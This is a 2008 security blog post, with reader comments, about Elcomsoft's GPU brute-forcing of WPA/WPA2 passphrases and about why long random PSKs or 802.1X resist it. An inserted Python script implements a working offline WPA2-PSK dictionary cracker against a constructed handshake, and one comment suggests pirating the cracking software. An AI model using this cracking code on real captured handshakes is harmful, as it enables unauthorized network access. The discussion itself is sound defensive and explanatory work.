Oct 10 2008

Brute force attacks against WPA/WPA2 using Nvidia cards

Published by at 6:39 am under Encryption, Security Advisories

According to The Register, the Russian company Elcomsoft has made a major jump in cracking WPA and WPA2 passphrases by using Nvidia graphics cards to brute force them.  They say a system with two Nvidia GTX 280 video cards can recover a passphrase roughly 100 times faster than anything before.  Attacks of this kind run offline against a captured handshake and guess the pre-shared key (PSK) passphrase; they are not an attack on the encryption itself, and enterprise (802.1X) deployments that don't use a PSK aren't the target.

Does that mean it’s time to shut down all your wifi and only use your wired network?  Not really, since this requires dedicated hardware and software.  Not everyone can afford $800 just for two video cards, let alone the $600 for Elcomsoft’s software and the roughly $500 it costs to buy the rest of the parts required to build a computer.  That’s not a trivial investment for most of us, especially right now.

If this were a piece of open source software that ran on any GPU, I’d be scared; it would be a real blow to wireless encryption.  But given the cost of the product and hardware, I doubt many people will be breaking WPA passwords in the near future.  However, the people out there who are targeting specific businesses looking for specific information will love this tool and use it often.  Can you say “corporate espionage”?

Don’t abandon your wifi yet, but continue to take the precautions you should be taking anyway.  Put your wireless on its own network, make your users VPN into the corporate network and add as many additional layers of security as your company lets you.  Issues like this are why security professionals continually use terms like ‘defense in depth’: when one layer of security fails, you need to have other protections in place to make sure you aren’t pwned like TJX.



13 Responses to “Brute force attacks against WPA/WPA2 using Nvidia cards”

  1. David Bergert on 10 Oct 2008 at 7:06 am

    Martin – I agree with all of this, but one thing: a $2000 investment is a small entry for this, depending on the value of the data that could be obtained on the wireless networks and resold. I also disagree that video cards that can be purchased at amazon.com and other big-box retailers are classified as “specialized hardware” to attackers. What I could not get from the article was the amount of time it would take; that is the real piece of data that we should be concerned about, along with other controls working in concert as you mentioned.

  2. Martin on 10 Oct 2008 at 7:21 am


    I agree that $2000 is small change if you’re a pen tester or organized crime hacker looking to compromise a specific target. But for the average script kiddie or curious security professional, it’s way out of line. That was why I put in the line about corporate espionage. And the link to Amazon was just to show how much the hardware costs, not a scientific study to find the lowest prices. :-)

    Good point on the amount of time it takes too. But if this brings brute forcing a password down to a week or two rather than months or years, the same class of people who’d be willing to spend $2000 on the computer and software aren’t going to be deterred.


  3. windexh8er on 10 Oct 2008 at 11:14 am

    I’m not sure this is as big a deal as stated. For one, you should be using 802.1x along with WPA2 regardless of whether you’re using it at home or not (maybe I should publish my documentation on implementing WPA2 Enterprise with EAP-TLS for the average user). If you’re using PSK you’re asking for it, and with airolib-ng and aircrack-ng, if you’re using any sort of dictionary word as your PSK anyone can crack it in a relatively short period of time if the DB is prehashed (i.e. rainbow-table-like for WPA[1/2] PSK).

    If you do want to stick with PSK then what most people should be doing is using an (actual) randomly generated PSK that’s 64 characters in length. I would be hard pressed to believe that Elcomsoft with 8 GPUs could crack that value in less than my lifetime (and hundreds of years after)… It’s just not feasible, which, again, is why I’m not sure this is that big of a deal. Just look at these numbers:


    And then look at this:


    So even if I could run 1,000,000 attempts per second against a 20 (fully random) character PSK you’re never going to be able to do it quickly enough for it to be feasible. This is just marketing FUD — but then again I haven’t been using PSK on my wireless networks for about 2 years. :)

    BTW — if you want that secure PSK that’s randomly generated just run this from any Linux box with OpenSSL installed:

    openssl rand -base64 64

    This will give you 64 characters of random PSK goodness that you won’t have to worry about! Crack that Elcomsoft…

  4. windex8er on 10 Oct 2008 at 11:22 am

    Sorry, my bad… Max is 63 characters for WPA!

    And here’s another good reference (scroll to the end and read the @$$ covering section if you don’t want to read the other stuff):


    I haven’t seen any of my clients using WPA PSK — so big corporate espionage is relatively unlikely. Most use a PEAP solution from what I’ve seen. If a business is using PSK they better have a darn good reason to be doing so! Considering I won’t even do it at home…

  5. Steve on 10 Oct 2008 at 12:14 pm

    63 characters using lower case, upper case, numbers and symbols provides 94 choices for each character. If I use a 63 character password, that 63 character password could be one of 1.9 * 10^126 possible choices. If you want to have a 100% chance of brute forcing this key in one year one would still need to execute 6*10^118 tries a second.

    It would be faster to attack the 256 bit hash as this only has 1.1*10^77 permutations. So if one could issue 3.6 *10^69 commands per second one could guarantee a break in one year. Let’s assume that it takes 10 flops (floating point operations) to test one key. As of August SETI@HOME is executing an average of 150 teraflops (150*10^12). Therefore one would still need ~ 2.5 *10^56 SETI@HOME projects to break one key in one year.
    The most efficient computer uses 2.8 watts per GFLOP. Therefore it would take 2.5*10^59 watts to break one key. Since the average usage of power for all people on the planet is 15 TW we would need 1.5*10^46 times the current power output of the planet to break one key.

    I think my key is safe.
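An added example, not code from the post, from any commenter, or from Elcomsoft or aircrack-ng, tying together windexh8er’s point about random versus dictionary PSKs and airolib-ng-style prehashing and Steve’s keyspace arithmetic. It implements the WPA/WPA2-PSK derivation from IEEE 802.11i (PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 iterations), the pairwise-key PRF and the EAPOL-Key MIC check a cracker uses to test each guess, then runs a small wordlist against a handshake the script builds itself. The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are constructed stand-ins, not a real capture; only the derivation constants come from the standard.

```python
import hashlib
import hmac
import secrets

# IEEE 802.11i: an ASCII passphrase is 8..63 printable characters (0x20..0x7E).
PSK_ALPHABET = "".join(chr(c) for c in range(0x20, 0x7F))
PSK_MAX_LEN = 63


def random_psk(length=PSK_MAX_LEN):
    """Uniformly random passphrase over all 95 printable ASCII symbols.

    secrets.choice draws from the whole alphabet; 'openssl rand -base64' uses
    only 64 symbols and emits 4/3 as many characters as random bytes.
    """
    if not 8 <= length <= PSK_MAX_LEN:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return "".join(secrets.choice(PSK_ALPHABET) for _ in range(length))


def pmk_from_passphrase(passphrase, ssid):
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).

    This is the step a cracker repeats once per guess. The SSID is the salt,
    so an airolib-ng style precomputed table only covers the SSIDs it was
    built for.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """Pairwise Transient Key (384 bits for CCMP); the KCK is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, frame_with_mic_zeroed):
    """WPA2 (AES key descriptor v2): MIC = HMAC-SHA1(KCK, EAPOL-Key frame)[:16],
    computed over the frame with its own MIC field set to zero."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, aa, spa, anonce, snonce, frame, captured_mic, wordlist):
    """Offline dictionary attack: return the candidate whose KCK reproduces the
    captured MIC, or None. Every candidate costs one full PBKDF2 run."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


def brute_force_years(length, guesses_per_second, alphabet_size=len(PSK_ALPHABET)):
    """Years to exhaust every passphrase of a given length at a fixed guess rate."""
    return alphabet_size ** length / guesses_per_second / (365.25 * 24 * 3600)


def demo(passphrase, wordlist):
    """Derive a handshake MIC for `passphrase` from constructed (not captured)
    values, then run the wordlist against it. Returns the recovered passphrase
    or None."""
    ssid = "corp-guest"                       # constructed SSID
    aa = bytes.fromhex("001122334455")        # constructed AP MAC
    spa = bytes.fromhex("66778899aabb")       # constructed client MAC
    anonce = bytes(range(32))                 # constructed nonces; real ones are random
    snonce = bytes(range(32, 64))
    # Constructed stand-in for EAPOL-Key message 2 with its MIC field zeroed;
    # a real cracker takes these bytes from the sniffed frame.
    frame = b"\x01\x03" + snonce + b"\x00" * 16
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    captured_mic = eapol_mic(kck, frame)      # what the sniffer would have recorded
    return crack_handshake(ssid, aa, spa, anonce, snonce, frame, captured_mic, wordlist)


if __name__ == "__main__":
    words = ["letmein", "password1", "corporate", "wireless"]   # constructed wordlist
    print("dictionary PSK recovered:", demo("corporate", words))
    print("random PSK recovered:", demo(random_psk(), words))
    print("years to exhaust 63 chars at 1e6 guesses/s: %.3g" % brute_force_years(63, 1e6))
```

One PBKDF2 call per guess is the whole cost model: the 4096 HMAC-SHA1 iterations are what a GPU parallelises, and because the SSID is the salt a precomputed table only helps against the SSIDs it was built for. A 100-fold speed-up moves the guess rate, not the 95^63 exponent of a full-length random passphrase.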

  6. Martin on 10 Oct 2008 at 1:51 pm

    So basically, what you guys are telling me is that unless someone is a complete idiot when it comes to securing their wireless network, this shouldn’t make one whit of difference to them. If they’re an idiot, this still won’t make a difference.


  7. […] Some more interesting reading from network security specialists can be found on the mckeay.net blog. […]

  8. […] I didn’t have the time on Friday to look deeper into the real time requirements to hack a WPA password using Elcomsoft’s new tools.  I knew the time needed was considerable, but I didn’t realize exactly how long […]

  9. windexh8er on 14 Oct 2008 at 4:23 am


    Basically! Schneier ran a post this morning about it as well. The gist is – weak passwords are weak. The 100 fold increase doesn’t really buy us much, unless minutes are crucial.


  10. Jeff Martens on 19 Oct 2008 at 10:36 am

    100-fold speed up is just under a factor of 2^7. So this is like reducing a 256 bit key to 249 bits. Not a big deal.

  11. […] one keen commenter pointed out, the reality and sheer mathematics behind it is mind boggling. WPA2 can be 63 characters using […]

  12. Orion on 04 Mar 2009 at 5:53 am

    It’s true that right now this is such a big deal,

    but what about custom-built FPGA boards? Those are relatively simple to build and should decrease the time considerably.

  13. ZeeLaG on 07 Jul 2010 at 10:48 am

    OK, you can take off the cost of Elcomsoft’s software, cause you can get it for FREE!!!! but illegally free. But if you’re going to get software that cracks passwords and use it for illegal purposes then what is the point? So just get a good enough computer with a good amount of RAM and a great GPU and you’ll be set..

    Software is always FREE but when it comes to the hardware…. that’s when you have to PAY!!
